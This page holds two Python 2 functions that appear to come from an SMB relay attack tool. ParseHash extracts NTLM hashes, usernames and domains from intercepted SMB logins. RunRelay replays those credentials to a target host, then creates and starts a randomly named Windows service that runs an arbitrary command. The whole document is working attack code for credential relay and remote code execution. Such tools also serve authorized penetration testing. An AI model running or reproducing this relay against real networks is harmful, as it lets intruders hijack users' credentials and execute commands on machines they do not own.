Example #1
0
def ParseHash(data, Client, Target):
    try:
        lenght = struct.unpack('<H', data[43:45])[0]
        LMhashLen = struct.unpack('<H', data[51:53])[0]
        NthashLen = struct.unpack('<H', data[53:55])[0]
        Bcc = struct.unpack('<H', data[63:65])[0]
        if NthashLen >= 30:
            Hash = data[65 + LMhashLen:65 + LMhashLen + NthashLen]
            pack = tuple(data[89 + NthashLen:].split('\x00\x00\x00'))[:2]
            var = [
                e.replace('\x00', '')
                for e in data[89 + NthashLen:Bcc +
                              60].split('\x00\x00\x00')[:2]
            ]
            Username, Domain = tuple(var)
            if ReadData("SMBRelay-Session.txt", Client, Username):
                print "[+]Auth from user %s with host %s previously failed. Won't relay." % (
                    Username, Client)
                pass
            if Username in UserToRelay:
                print '%s sent a NTLMv2 Response..\nVictim OS is : %s. Passing credentials to: %s' % (
                    Client, RunSmbFinger((Client, 445)), Target)
                print "Username : "******"Domain (if joined, if not then computer name) : ", Domain
                return data[65:65 + LMhashLen], data[
                    65 + LMhashLen:65 + LMhashLen +
                    NthashLen], Username, Domain, Client
        if NthashLen == 24:
            pack = tuple(data[89 + NthashLen:].split('\x00\x00\x00'))[:2]
            var = [
                e.replace('\x00', '')
                for e in data[89 + NthashLen:Bcc +
                              60].split('\x00\x00\x00')[:2]
            ]
            Username, Domain = tuple(var)
            if ReadData("SMBRelay-Session.txt", Client, Username):
                print "Auth from user %s with host %s previously failed. Won't relay." % (
                    Username, Client)
                pass
            if Username in UserToRelay:
                print '%s sent a NTLMv1 Response..\nVictim OS is : %s. Passing credentials to: %s' % (
                    Client, RunSmbFinger((Client, 445)), Target)
                LMHashing = data[65:65 + LMhashLen].encode('hex').upper()
                NTHashing = data[65 + LMhashLen:65 + LMhashLen +
                                 NthashLen].encode('hex').upper()
                print "Username : "******"Domain (if joined, if not then computer name) : ", Domain
                return data[65:65 + LMhashLen], data[
                    65 + LMhashLen:65 + LMhashLen +
                    NthashLen], Username, Domain, Client
            else:
                print "'%s' user was not specified in -u option, won't relay authentication. Allowed users to relay are: %s" % (
                    Username, UserToRelay)
                pass

    except Exception:
        raise
Example #2
0
def RunRelay(host, Command, Domain):
    Target = host
    CMD = Command
    print "Target is running: ", RunSmbFinger((host, 445))
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, 445))
    h = SMBHeader(cmd="\x72",
                  flag1="\x18",
                  flag2="\x03\xc7",
                  pid="\xff\xfe",
                  tid="\xff\xff")
    n = SMBNego(Data=SMBNegoData())
    n.calculate()
    packet0 = str(h) + str(n)
    buffer0 = longueur(packet0) + packet0
    s.send(buffer0)
    data = s.recv(2048)
    Key = ParseAnswerKey(data, host)
    DomainMachineName = ParseDomain(data)
    if data[8:10] == "\x72\x00":
        try:
            a = SmbRogueSrv139(Key, Target, DomainMachineName)
            if a is not None:
                LMHash, NTHash, Username, OriginalDomain, CLIENTIP = a
                if Domain == None:
                    Domain = OriginalDomain
                if ReadData("SMBRelay-Session.txt", Target, Username, CMD):
                    pass
                else:
                    head = SMBHeader(cmd="\x73",
                                     flag1="\x18",
                                     flag2="\x03\xc8",
                                     pid="\xff\xfe",
                                     mid="\x01\x00")
                    t = SMBSessionTreeData(AnsiPasswd=LMHash,
                                           UnicodePasswd=NTHash,
                                           Username=Username,
                                           Domain=Domain,
                                           Targ=Target)
                    t.calculate()
                    packet0 = str(head) + str(t)
                    buffer1 = longueur(packet0) + packet0
                    s.send(buffer1)
                    data = s.recv(2048)
        except:
            raise
            a = None
    if data[8:10] == "\x73\x6d":
        print "[+] Relay failed, auth denied. This user doesn't have an account on this target."
        Logs.info(CLIENTIP + ":" + Username)
    if data[8:10] == "\x73\x0d":
        print "[+] Relay failed, SessionSetupAndX returned invalid parameter. It's most likely because both client and server are >=Windows Vista"
        Logs.info(CLIENTIP + ":" + Username)
        ## NtCreateAndx
    if data[8:10] == "\x73\x00":
        print "[+] Authenticated, trying to PSexec on target !"
        head = SMBHeader(cmd="\xa2",
                         flag1="\x18",
                         flag2="\x02\x28",
                         mid="\x03\x00",
                         pid=data[30:32],
                         uid=data[32:34],
                         tid=data[28:30])
        t = SMBNTCreateData()
        t.calculate()
        packet0 = str(head) + str(t)
        buffer1 = longueur(packet0) + packet0
        s.send(buffer1)
        data = s.recv(2048)
        ## Fail Handling.
    if data[8:10] == "\xa2\x22":
        print "[+] Exploit failed, NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation?"
        ## DCE/RPC Write.
    if data[8:10] == "\xa2\x00":
        head = SMBHeader(cmd="\x2f",
                         flag1="\x18",
                         flag2="\x05\x28",
                         mid="\x04\x00",
                         pid=data[30:32],
                         uid=data[32:34],
                         tid=data[28:30])
        x = SMBDCEData()
        x.calculate()
        f = data[42:44]
        t = SMBWriteData(FID=f, Data=x)
        t.calculate()
        packet0 = str(head) + str(t)
        buffer1 = longueur(packet0) + packet0
        s.send(buffer1)
        data = s.recv(2048)
        ## DCE/RPC Read.
        if data[8:10] == "\x2f\x00":
            head = SMBHeader(cmd="\x2e",
                             flag1="\x18",
                             flag2="\x05\x28",
                             mid="\x05\x00",
                             pid=data[30:32],
                             uid=data[32:34],
                             tid=data[28:30])
            t = SMBReadData(FID=f)
            t.calculate()
            packet0 = str(head) + str(t)
            buffer1 = longueur(packet0) + packet0
            s.send(buffer1)
            data = s.recv(2048)
            ## DCE/RPC SVCCTLOpenManagerW.
            if data[8:10] == "\x2e\x00":
                head = SMBHeader(cmd="\x2f",
                                 flag1="\x18",
                                 flag2="\x05\x28",
                                 mid="\x06\x00",
                                 pid=data[30:32],
                                 uid=data[32:34],
                                 tid=data[28:30])
                w = SMBDCESVCCTLOpenManagerW(
                    MachineNameRefID="\x00\x00\x03\x00")
                w.calculate()
                x = SMBDCEPacketData(Data=w)
                x.calculate()
                t = SMBWriteData(FID=f, Data=x)
                t.calculate()
                packet0 = str(head) + str(t)
                buffer1 = longueur(packet0) + packet0
                s.send(buffer1)
                data = s.recv(2048)
                ## DCE/RPC Read Answer.
                if data[8:10] == "\x2f\x00":
                    head = SMBHeader(cmd="\x2e",
                                     flag1="\x18",
                                     flag2="\x05\x28",
                                     mid="\x07\x00",
                                     pid=data[30:32],
                                     uid=data[32:34],
                                     tid=data[28:30])
                    t = SMBReadData(FID=f)
                    t.calculate()
                    packet0 = str(head) + str(t)
                    buffer1 = longueur(packet0) + packet0
                    s.send(buffer1)
                    data = s.recv(2048)
                    ## DCE/RPC SVCCTLCreateService.
                    if data[8:10] == "\x2e\x00":
                        if data[len(data) - 4:] == "\x05\x00\x00\x00":
                            print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?"
                        print "[+] Creating service"
                        head = SMBHeader(cmd="\x2f",
                                         flag1="\x18",
                                         flag2="\x05\x28",
                                         mid="\x08\x00",
                                         pid=data[30:32],
                                         uid=data[32:34],
                                         tid=data[28:30])
                        ContextHandler = data[88:108]
                        ServiceNameChars = ''.join([
                            random.choice(
                                'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
                            ) for i in range(11)
                        ])
                        ServiceIDChars = ''.join([
                            random.choice(
                                'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
                            ) for i in range(16)
                        ])
                        FileChars = ''.join([
                            random.choice(
                                'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
                            ) for i in range(6)
                        ]) + '.bat'
                        w = SMBDCESVCCTLCreateService(
                            ContextHandle=ContextHandler,
                            ServiceName=ServiceNameChars,
                            DisplayNameID=ServiceIDChars,
                            ReferentID="\x21\x03\x03\x00",
                            BinCMD=CMD)
                        w.calculate()
                        x = SMBDCEPacketData(Opnum="\x0c\x00", Data=w)
                        x.calculate()
                        t = SMBWriteData(Offset="\x9f\x01\x00\x00",
                                         FID=f,
                                         Data=x)
                        t.calculate()
                        packet0 = str(head) + str(t)
                        buffer1 = longueur(packet0) + packet0
                        s.send(buffer1)
                        data = s.recv(2048)
                        ## DCE/RPC Read Answer.
                        if data[8:10] == "\x2f\x00":
                            head = SMBHeader(cmd="\x2e",
                                             flag1="\x18",
                                             flag2="\x05\x28",
                                             mid="\x09\x00",
                                             pid=data[30:32],
                                             uid=data[32:34],
                                             tid=data[28:30])
                            t = SMBReadData(FID=f,
                                            MaxCountLow="\x40\x02",
                                            MinCount="\x40\x02",
                                            Offset="\x82\x02\x00\x00")
                            t.calculate()
                            packet0 = str(head) + str(t)
                            buffer1 = longueur(packet0) + packet0
                            s.send(buffer1)
                            data = s.recv(2048)
                            ## DCE/RPC SVCCTLOpenService.
                            if data[8:10] == "\x2e\x00":
                                if data[len(data) - 4:] == "\x05\x00\x00\x00":
                                    print "[+] Failed to create the service"

                                head = SMBHeader(cmd="\x2f",
                                                 flag1="\x18",
                                                 flag2="\x05\x28",
                                                 mid="\x0a\x00",
                                                 pid=data[30:32],
                                                 uid=data[32:34],
                                                 tid=data[28:30])
                                w = SMBDCESVCCTLOpenService(
                                    ContextHandle=ContextHandler,
                                    ServiceName=ServiceNameChars)
                                w.calculate()
                                x = SMBDCEPacketData(Opnum="\x10\x00", Data=w)
                                x.calculate()
                                t = SMBWriteData(Offset="\x9f\x01\x00\x00",
                                                 FID=f,
                                                 Data=x)
                                t.calculate()
                                packet0 = str(head) + str(t)
                                buffer1 = longueur(packet0) + packet0
                                s.send(buffer1)
                                data = s.recv(2048)
                                ## DCE/RPC Read Answer.
                                if data[8:10] == "\x2f\x00":
                                    head = SMBHeader(cmd="\x2e",
                                                     flag1="\x18",
                                                     flag2="\x05\x28",
                                                     mid="\x0b\x00",
                                                     pid=data[30:32],
                                                     uid=data[32:34],
                                                     tid=data[28:30])
                                    t = SMBReadData(FID=f,
                                                    MaxCountLow="\x40\x02",
                                                    MinCount="\x40\x02",
                                                    Offset="\x82\x02\x00\x00")
                                    t.calculate()
                                    packet0 = str(head) + str(t)
                                    buffer1 = longueur(packet0) + packet0
                                    s.send(buffer1)
                                    data = s.recv(2048)
                                    ## DCE/RPC SVCCTLStartService.
                                    if data[8:10] == "\x2e\x00":
                                        if data[len(data) -
                                                4:] == "\x05\x00\x00\x00":
                                            print "[+] Failed to open the service"
                                        ContextHandler = data[88:108]
                                        head = SMBHeader(cmd="\x2f",
                                                         flag1="\x18",
                                                         flag2="\x05\x28",
                                                         mid="\x0a\x00",
                                                         pid=data[30:32],
                                                         uid=data[32:34],
                                                         tid=data[28:30])
                                        w = SMBDCESVCCTLStartService(
                                            ContextHandle=ContextHandler)
                                        x = SMBDCEPacketData(Opnum="\x13\x00",
                                                             Data=w)
                                        x.calculate()
                                        t = SMBWriteData(
                                            Offset="\x9f\x01\x00\x00",
                                            FID=f,
                                            Data=x)
                                        t.calculate()
                                        packet0 = str(head) + str(t)
                                        buffer1 = longueur(packet0) + packet0
                                        s.send(buffer1)
                                        data = s.recv(2048)
                                        ## DCE/RPC Read Answer.
                                        if data[8:10] == "\x2f\x00":
                                            head = SMBHeader(cmd="\x2e",
                                                             flag1="\x18",
                                                             flag2="\x05\x28",
                                                             mid="\x0b\x00",
                                                             pid=data[30:32],
                                                             uid=data[32:34],
                                                             tid=data[28:30])
                                            t = SMBReadData(
                                                FID=f,
                                                MaxCountLow="\x40\x02",
                                                MinCount="\x40\x02",
                                                Offset="\x82\x02\x00\x00")
                                            t.calculate()
                                            packet0 = str(head) + str(t)
                                            buffer1 = longueur(
                                                packet0) + packet0
                                            s.send(buffer1)
                                            data = s.recv(2048)
                                            if data[8:10] == "\x2e\x00":
                                                print "[+] Command successful !"
                                                Logs.info(
                                                    'Command successful:')
                                                Logs.info(Target + "," +
                                                          Username + ',' + CMD)
                                                return True
                                            if data[8:10] != "\x2e\x00":
                                                return False